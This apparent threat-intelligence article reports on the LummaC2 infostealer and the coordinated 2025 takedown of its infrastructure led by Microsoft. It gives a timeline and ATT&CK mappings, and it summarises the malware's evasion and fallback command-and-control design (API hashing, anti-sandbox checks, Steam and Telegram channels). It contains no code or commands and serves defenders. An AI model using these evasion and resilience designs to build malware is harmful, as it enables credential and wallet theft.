Disrupting Lumma Stealer Malware – Microsoft Leads Global Action

Introduction to Malware Binary Triage (IMBT) Course

Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.

Originally surfacing in 2022, LummaC2 continues to be distributed via spear phishing emails, malicious links, and spoofed software downloads. In some campaigns, attackers employed fake CAPTCHA challenges to deceive users into triggering malware execution, which begins with a simple Run command that activates a hidden PowerShell payload. The malware’s stealth-focused design allows it to operate in memory and evade detection by many traditional endpoint solutions.

LummaC2’s functionality includes browser data theft, credential harvesting, crypto wallet extraction, and even the capture of multifactor authentication tokens. Once executed, the malware establishes contact with its command-and-control servers, retrieves encrypted JSON instructions, and runs a series of modular commands. These include data theft, file downloads, screenshots, and even self-deletion routines to erase traces from infected systems.

Understanding the Threat of Lumma

LummaC2 Stealer, first observed in 2022, emerged as a top-tier Malware-as-a-Service (MaaS) tool. Developed by a Russian-based actor known as “Shamel,” Lumma was sold through subscription tiers ranging from $250 to $1,000 per month, with source code access offered at $20,000. The operation included Gitbook-hosted documentation that lowered the barrier for less skilled cybercriminals.

Luma was distributed through phishing emails, malvertising, and spoofed software downloads. Microsoft observed a major campaign in March 2025 impersonating Booking.com, which used fake reservation emails to deliver it and other stealers. Groups like Octo Tempest (Scattered Spider) relied on the stealer to harvest credentials before launching ransomware attacks against high-value targets in finance, healthcare, and education.

Timeline of Events

Date	Event Description
Late 2022	LummaC2 appears on Russian-speaking forums as a Malware-as-a-Service offering
Nov 2023	Developer “Shamel” claims 400 active clients in an interview
Apr – Jun 2024	21,000+ LummaC2 log listings appear on dark web forums
Mar 2025	LummaC2 used in phishing campaign impersonating Booking.com
Mar – May 2025	Microsoft detects over 394,000 Windows infections caused by LummaC2
May 13, 2025	Microsoft files legal action; DOJ seizes control panel domains
May 15, 2025	Operators attempt to restore service; 3 new domains are spun up and seized again
May 16, 2025	Coordination with Europol and JC3 completes the disruption of remaining infrastructure
May 21, 2025	Public announcement of takedown; FBI takes over Lumma Telegram channel

Microsoft Files Legal Action Against Lumma

On May 13, 2025, Microsoft’s Digital Crimes Unit (DCU), backed by international law enforcement and cybersecurity vendors, launched a major operation to dismantle the infrastructure behind Lumma Stealer – a widely abused infostealer malware strain used by threat actors worldwide. Supported by a court order from the U.S. District Court for the Northern District of Georgia, the DCU worked with the Department of Justice, Europol, and other global partners to take down Lumma’s technical infrastructure.

The operation led to the seizure and redirection of over 2,300 malicious domains that formed Lumma’s communication backbone. Microsoft sinkholed more than 1,300 of these domains, severing control from infected systems while enabling telemetry to monitor callbacks and assist in broader threat intelligence.

FBI and CISA Issue Technical Advisory

Following Microsoft’s disruption operation, the FBI and CISA released a joint advisory on May 21, 2025, detailing continued exploitation of LummaC2 malware by threat actors targeting U.S. critical infrastructure sectors. The advisory confirms that the malware remains active in the wild, with infections observed as recently as May 2025.

Technically, Lumma operated in memory and avoided creating artifacts on disk. It contacted command-and-control (C2) domains to retrieve encrypted JSON instructions, which enabled it to exfiltrate browser data, session tokens, MFA credentials, and cryptocurrency wallet information. The advisory noted over 21,000 LummaC2 log listings on criminal marketplaces in Q2 2024, reflecting the malware’s widespread deployment.

Technical Insights from the Advisory

CISA’s report maps LummaC2 behavior to MITRE ATT&CK techniques, emphasizing its ability to bypass defenses via obfuscation and masquerading. Notably, the malware uses APIs like GetUserNameW and GetComputerNameW for initial system identification. If certain hardcoded values are matched, execution halts – a likely safeguard to avoid running on the attacker’s own machines.

Otherwise, the malware proceeds to retrieve and parse configuration files from its C2 domains. These files instruct the malware on what data to collect or what further actions to perform. LummaC2 supports command options to specify file types, paths, maximum sizes, and custom targets. It even distinguishes between browsers for targeted data extraction, including special handling for Mozilla-based browsers.

MITRE ATT&CK TTPs Associated with LummaC2 Malware

The following table highlights the tactics and techniques used by LummaC2 operators as identified by CISA and the FBI. Each entry is mapped to the MITRE ATT&CK for Enterprise framework, offering insight into how the malware achieves access, evasion, data theft, and communication.

Tactic	Technique Title	Technique ID	Description
Initial Access	Phishing	T1566	Used phishing emails to deliver LummaC2 payloads.
	Spearphishing Attachment	T1566.001	Delivered malware via malicious attachments.
	Spearphishing Link	T1566.002	Delivered payload through links embedded in phishing emails.
Defense Evasion	Obfuscated Files or Information	T1027	Obfuscated malware to evade detection by EDR and antivirus tools.
	Masquerading	T1036	Disguised payloads as legitimate software.
	Deobfuscate/Decode Files or Information	T1140	Decoded C2 domains at runtime to bypass static analysis.
Discovery	Query Registry	T1012	Queried system information via Windows APIs.
	Browser Information Discovery	T1217	Targeted and harvested browser data and extensions.
Collection	Automated Collection	T1119	Stole stored credentials, crypto wallets, and authentication tokens.
Command & Control	Web Protocols (POST Requests)	T1071.001	Used encrypted POST requests to communicate with C2 servers.
	Ingress Tool Transfer	T1105	Downloaded additional files onto the infected host.
Exfiltration	Exfiltration	TA0010	Exfiltrated sensitive data including credentials and MFA secrets.
	Native API	T1106	Executed downloaded files using Windows native APIs (e.g., rundll32.exe or LoadLibrary).

For related IOCs and file hashes, refer to the official CISA advisory.

Inside LummaC2: Engineering a Malware Empire

LummaC2’s rapid rise and sustained dominance in the malware-as-a-service space was powered by its highly engineered, evasive architecture. Built in C/C++, the malware relied on control flow flattening, XOR string obfuscation, and MurmurHash2-based API hashing – all techniques aimed at complicating static analysis and thwarting automated detection systems. To avoid sandbox environments and dynamic analysis, Lumma included anti-sandbox logic that delayed execution until it detected human interaction, such as mouse movement.

Its command-and-control infrastructure was equally resilient. Lumma cycled through nine hardcoded primary domains and, if those failed, fell back to obfuscated Steam profile URLs using a simple ROT cipher for domain encoding. A tertiary layer relied on Telegram channels to sustain access, a method increasingly seen in modern malware families. Cloudflare infrastructure was also exploited to hide the true origin of Lumma’s backend systems, helping the operators mask their data collection servers behind proxy protections.

Global Coordination and the Role of Europol, Cloudflare, and Industry

While LummaC2’s technical complexity made it difficult to contain, its demise was eventually orchestrated by a global response. The disruption was initiated by Microsoft’s Digital Crimes Unit, which filed legal action and seized more than 2,300 domain names. Europol worked with law enforcement agencies throughout Europe to ensure that infrastructure hosted in the EU was taken offline and that investigations did not conflict.

The US Department of Justice seized several control panel domains used by Lumma’s operators. When threat actors attempted to recover by creating new domains within 48 hours, they were quickly identified and dismantled as well. Simultaneously, Japan’s JC3 led infrastructure takedowns in Asia, rounding out the triangulated disruption effort.

Cloudflare’s Cloudforce One and Trust & Safety teams also played a critical role. Lumma Stealer had been abusing Cloudflare’s services to conceal the origins of its malware command infrastructure and marketplace. In response, Cloudflare suspended malicious customer accounts and enhanced its interstitial warning page with Turnstile verification, which effectively blocked Lumma’s attempts to bypass detection mechanisms. Additionally, Cloudflare worked with Microsoft and multiple domain registrars to ensure that Lumma’s operators couldn’t simply reconfigure DNS settings and regain access to seized domains.

Security researchers from Bitsight’s TRACE team contributed to the broader takedown by helping identify over 1,000 malicious domains, 90+ Telegram channels, and multiple Steam profiles linked to Lumma’s fallback communication network.

What made this operation unique wasn’t just its scale but its synchronization. The collaborative response targeted every layer of Lumma’s infrastructure – its control panels, communication backbones, monetization methods, and data delivery channels – neutralizing both its frontend and backend capabilities in one strategic sweep.

Aftermath and Messaging: FBI Takes Over Lumma’s Channels

As the final blow to LummaC2’s public presence, the FBI took control of at least one of Lumma’s Telegram channels, replacing its content with a striking message directed at the malware’s subscribers. The post featured Lumma’s bird logo behind bars, symbolizing the takedown of the operation and the accountability of its operators.

The message confirmed that Lumma’s infrastructure had been seized and that subscriber access was permanently revoked. It also emphasized that user logs and account information were now in the hands of U.S. authorities. In a tone both assertive and clear, the FBI noted that “your administrator didn’t protect you,” highlighting how quickly the operation folded despite its perceived resilience.

The post concluded with multiple contact options for affected individuals – including Telegram, Signal, and a dedicated email ([email protected]) – implying that outreach from law enforcement is far from over. The tone made clear that not only was the infrastructure dismantled, but the entire user ecosystem is now under scrutiny.

This kind of public-facing messaging represents a psychological tactic aimed at eroding trust in threat actors. It sends a warning to both users and developers: no service is untouchable, and takedowns can come with visible, lasting consequences.

Lessons for the Future

LummaC2 is a case study in the evolution of malware – from simple credential stealers to full-blown platforms with corporate-style customer support and fallback mechanisms. Its demise offers key takeaways:

• Redundancy is standard: Single-layer defenses are no longer enough
• Legitimate services are abused: Steam and Telegram were fallback channels
• Partnerships are powerful: Private-public collaboration was essential to this success

Uncover Hidden Threats with SOCRadar’s Malware Analysis

Malware threats are increasingly complex, evasive, and adaptable. Detecting them is only the first step; understanding how they work allows for effective defense.

SOCRadar’s Malware Analysis feature, which is part of the larger SOCRadar Cyber Threat Intelligence (CTI) module, allows security teams to analyze suspicious files in a controlled environment, revealing the true behavior and intent of malicious code. Whether dealing with unknown payloads, evasive droppers, or heavily obfuscated binaries, the module helps answer critical questions, such as which systems or data the malware targets.

• What systems or data does the malware target?
• How does it execute, persist, and communicate?
• Which defensive techniques does it attempt to bypass?

From Threat Actor Monitoring and Vulnerability Intelligence to Dark Web Intelligence and Tactical IOC feeds, SOCRadar CTI offers an integrated platform for understanding and defending against the full cybercrime lifecycle. The platform connects telemetry from stealer logs, ransomware groups, phishing kits, and threat campaigns to help you stay ahead of attackers.

Whether you’re triaging a new incident, mapping infrastructure reuse, or proactively monitoring for emerging threats, SOCRadar gives you the context and tools to act fast – and act smart.

Conclusion

The dismantling of LummaC2 represents a rare and meaningful disruption in the cybercrime landscape. It underscores the growing capability of public-private coalitions to bring down even the most resilient and widely-used malware infrastructures. While LummaC2 is no longer operational, its tactics, codebase, and business model may resurface in future malware strains.

For defenders, the key takeaway isn’t just that Lumma was stopped – it’s how. Cooperation, telemetry, legal frameworks, and global reach combined to deliver one of the most successful takedowns in recent memory. It’s a reminder that while threat actors move fast, defenders can strike harder – especially when united.

Article Link: https://socradar.io/disrupting-lumma-stealer-malware-microsoft-leads-global-action/